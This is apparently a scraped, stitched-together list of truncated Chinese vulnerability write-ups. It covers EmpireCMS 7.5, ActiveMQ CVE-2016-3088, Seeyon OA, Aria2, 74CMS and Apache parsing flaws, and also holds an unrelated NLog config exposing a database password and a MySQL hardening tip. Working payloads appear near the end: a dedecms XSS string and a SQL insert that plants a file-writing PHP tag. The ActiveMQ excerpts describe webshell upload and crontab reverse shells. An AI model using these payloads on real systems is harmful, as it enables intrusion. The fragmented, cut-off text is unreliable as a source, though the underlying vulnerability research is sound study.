帝国CMS(EmpireCMS) v7.5配置文件写入漏洞分析 一.漏洞描述 该漏洞是由于安装程序时没有对用户的输入做严格过滤,导致用户输入的可控参数被写入配置文件,造成任意代码执行漏洞. 二.漏洞复现 1.漏洞出现位置如下图,phome_表前缀没有被严格过滤导致攻击者构造恶意的代码 2.定位漏洞出现的位置,发现在/e/install/index.php,下图可以看到表名前缀phome_,将获取表名前缀交给了mydbtbpre参数. 3.全文搜索,$mydbtbpre,然后跟进参数传递,发现将用

帝国CMS(EmpireCMS) v7.5 前台XSS漏洞分析 一.漏洞描述 该漏洞是由于javascript获取url的参数,没有经过任何过滤,直接当作a标签和img标签的href属性和src属性输出. 二.漏洞复现 1.需要开启会员空间功能(默认关闭),登录后台开启会员空间功能. 2.漏洞出现的位置在/e/ViewImg/index.html,浏览代码,发现如下代码存在漏洞 分析代码:通过Request函数获取地址栏的url参数,并作为img和a标签的src属性和href属性,然后经过doc

帝国CMS(EmpireCMS) v7.5 后台XSS漏洞分析 一.漏洞描述 该漏洞是由于代码只使用htmlspecialchars进行实体编码过滤,而且参数用的是ENT_QUOTES(编码双引号和单引号),还有addslashes函数处理,但是没有对任何恶意关键字进行过滤,从而导致攻击者使用别的关键字进行攻击. 二.漏洞复现 1.漏洞出现的页面在/e/admin/openpage/AdminPage.php,浏览漏洞页面代码,发现使用hRepPostStr函数对leftfile.title.m

帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462) 一.漏洞描述 EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞.该漏洞源于外部输入数据构造代码段的过程中,网路系统或产品未正确过滤其中的特殊元素.攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流. 二.影响版本 EmpireCMS<=7.5 三.环境搭建 1.官方下载EmpireCMS V7.5 下载地址:http://www.phome.n

帝国CMS(EmpireCMS) v7.5后台getshell分析(CVE-2018-18086) 一.漏洞描述 EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行.EmpireCMS7.5版本中的/e/class/moddofun.php文件的”LoadInMod”函数存在安全漏洞,攻击者可利用该漏洞上传任意文件. 二.影响版本 EmpireCMS<=7.5 三.环境搭建 1.官方下载EmpireCMS V7.5 下载地址:

帝国CMS(EmpireCMS) v7.5后台任意代码执行 一.漏洞描述 EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行. 二.影响版本 EmpireCMS<=7.5 三.环境搭建 1.官方下载EmpireCMS V7.5 下载地址:http://www.phome.net/download/ 2.把下载的文件中的upload下的所有目录和文件放入到网站根目录下 3.修改php.ini配置文件, PHP环境中必须开启短标签

ActiveMQ任意文件写入漏洞(版本在5.12.X前CVE-2016-3088) 查看docker的activemq版本命令:$ docker ps | grep activemq927860512db9 rmohr/activemq:5.15.4-alpine 从上面可以看到版本是activemq:5.15.4-alpine 在该漏洞修复版本之上,不用担心了. -------------------------使用 docker 复现该漏洞,搭建环境vulhub/activemq at ma

phithon师父在小蜜圈里放了一个经典的配置文件写入问题漏洞. <?phpif(!isset($_GET['option'])) die();$str = addslashes($_GET['option']);$file = file_get_contents('./config.php');$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);file_put_contents('./co

近期爆出致远 OA 系统的一些版本存在任意文件写入漏洞,远程攻击者在无需登录的情况下可通过向 URL /seeyon/htmlofficeservlet POST 精心构造的数据即可向目标服务器写入任意文件,写入成功后可执行任意系统命令进而控制目标服务器. 目前已知易受攻击的版本: 致远A8-V5协同管理软件 V6.1sp1 致远A8+协同管理软件 V7.0.V7.0sp1.V7.0sp2.V7.0sp3 致远A8+协同管理软件 V7.1 如果成功利用此漏洞的攻击者可以在目标系统上写入任意文件,

Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现 一.漏洞描述 该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录.Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问. 二.漏洞影响版本 Apache ActiveMQ 5.0.0 - 5.13.2

目录: 简介 漏洞描述 payload 漏洞复现 一.Aria2介绍 Aria2是一个命令行下运行,多协议,多来源下载工具(HTTP / HTTPS,FTP,BitTorrent,Metalink),内建XML-RPC用户界面.Aria提供RPC服务器,通过--enable-rpc参数启动.Aria2的RPC服务器可以方便的添加,删除下载项目. 二.漏洞描述 通过控制文件下载链接,文件储存路径以及文件名,可以实现任意文件写入.同时通过Aria2提供的其他功能,诸如save-session等也能轻

上传webshell 容器用vulhub的 PUT一个jsp文件 MOVE到api目录 默认的ActiveMQ账号密码均为admin,首先访问http://your-ip:8161/admin/test/systemProperties.jsp,查看ActiveMQ的绝对路径: 访问 其它利用方法--转 写入crontab,自动化弹shell 这是一个比较稳健的方法.首先上传cron配置文件(注意,换行一定要\n,不能是\r\n,否则crontab执行会失败) PUT /fileserver/1

      0x00 实验环境 攻击机:Win 10 靶机也可作为攻击机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 未禁用PUT.MOVE等高危方法的ActiveMq版本(可自行尝试) 0x02 漏洞复现 (1)实验环境:docker运行的vulhub漏洞环境首先,可直接访问到页面的显示为: (2)使用默认弱口令:admin/admin即可登录至后台:(注:没有密码无法写shell) (3)访问目录信息泄露页面可获取ActiveMq安装目录: http://i

一. 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二.代码审计 1．双击启动桌面Seay源代码审计系统软件 2．因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3．点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定 漏洞分析 1．点击展开左侧admin目录,在弹出的下拉列表中双击admin_templates.php页面,右侧页面可以看到相关代码. elseif ($act ==

NLog配置文件: <target xsi:type="Database" name="database" connectionString="Data Source=10.1.11.139;Initial Catalog=EnterpriseOPDB;User Id=sa;Password=Asdf1234"> <commandText> insert into [EnterpriseTest].[dbo].MyLog

漏洞地址及证明:/include/dialog/config.php?adminDirHand="/></script><script>alert(1);</script>

解释下Apache解析文件的流程: 当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名.如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式. 那么这样的话,像1.php.bak这样的文件名就会被当做php文件所解析.这也就是传说中的Apache解析漏洞. 利用条件:首先,是目标站安装完cms后并没有删除install文件夹,漏洞文件

在 install/index.php 的第44行 expString::sanitize($_REQUEST); 跟进sanitize函数 public static function sanitize(&$data) { // return $data; if (is_array($data)) { $saved_params = array(); if (!empty($data['controller']) && $data['controller'] == 'snippe

因为被别人利用mysql攻击,所以想在这里帮助大家提高一下自身mysql的安全.避免成为别人的肉鸡. show global variables like '%secure%'; 如果是这样则黑客可以利用MySQL在系统注入文件. 在linux下这个是不给设置为null的,否则数据库启动不了. 我在这里直接设置成/dev/null 这样即使黑客要注入文件耶没有用. 编辑my.cnf 在[mysqld]下面加上这么一个配置选项:secure_file_priv = /dev/null 然后重启my

测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp =@fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');